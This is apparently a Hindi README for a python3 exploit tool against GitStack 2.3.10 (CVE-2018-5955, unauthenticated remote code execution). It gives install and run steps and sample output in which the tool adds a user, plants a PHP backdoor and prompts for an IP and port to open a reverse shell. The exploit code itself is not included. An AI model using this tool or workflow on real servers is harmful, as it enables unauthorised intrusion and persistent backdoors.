
CVE-2018-5955 GitStack 2.3.10 बिना प्रमाणीकरण के RCE के लिए एक शोषण
CVE-2018-5955 GitStack 2.3.10 के लिए एक शोषण (Unauthenticated RCE)
शोषण: GitStack 2.3.10 बिना प्रमाणीकरण के दूरस्थ कोड निष्पादन (Unauthenticated Remote Code Execution)
दिनांक: 18.01.2018
सॉफ़्टवेयर लिंक: https://gitstack.com/
शोषण लेखक: Kacper Szurek
मूल शोषण: https://www.exploit-db.com/exploits/43777
वेबसाइट: https://security.szurek.pl/
श्रेणी: दूरस्थ
CVE: CVE-2018-5955
दिनांक: 23.06.2023
नई सुविधाएँ: इंटरैक्टिव RCE, OS पता लगाना, रिवर्स शेल फंक्शन, python2 से python3 में अनुकूलित
CVE: CVE-2018-5955
श्रेणी: दूरस्थ
मैं आपके कार्यों के लिए कोई जिम्मेदारी नहीं लेता, क्योंकि मैंने इसे शिक्षा उद्देश्यों या प्रमाणित और अधिकृत पैठ परीक्षण के लिए github पर पोस्ट किया है।
आवश्यकताएँ स्थापित करें:
pip install colorama
फिर, आप इसे इस प्रकार चला सकते हैं:
python3 exploit.py
CVE का शोषण करने के बाद OS का पता लग जाएगा, वास्तव में आउटपुट की यह पंक्ति होगी: "[*] OS: $operatingsystem" (नीचे प्रदर्शन)
[+] उपयोगकर्ता सूची प्राप्त करें
[+] उपयोगकर्ता twreath मिला
[+] वेब रिपॉजिटरी पहले से सक्षम
[+] रिपॉजिटरी सूची प्राप्त करें
[+] रिपॉजिटरी Website मिला
[+] रिपॉजिटरी में उपयोगकर्ता जोड़ें
[+] किसी के लिए पहुँच अक्षम करें
[+] PHP में बैकडोर बनाएँ
[*] रिवर्स शेल पाने के लिए 'shell' टाइप करें
[*] OS : Windows <----
आप यह पता लगाने के लिए "os" भी टाइप कर सकते हैं कि किस प्रकार का ऑपरेटिंग सिस्टम है
लक्ष्य पर वास्तविक रिवर्स शेल प्राप्त करने के लिए आप "shell" टाइप कर सकते हैं और फिर अपना IP और अपना सुनने का पोर्ट इस प्रकार टाइप करें:
RCE > shell
[?] कृपया शेल के लिए IP पता दर्ज करें: आपका IP यहाँ
[?] कृपया शेल के लिए पोर्ट नंबर दर्ज करें: आपका सुनने का पोर्ट यहाँ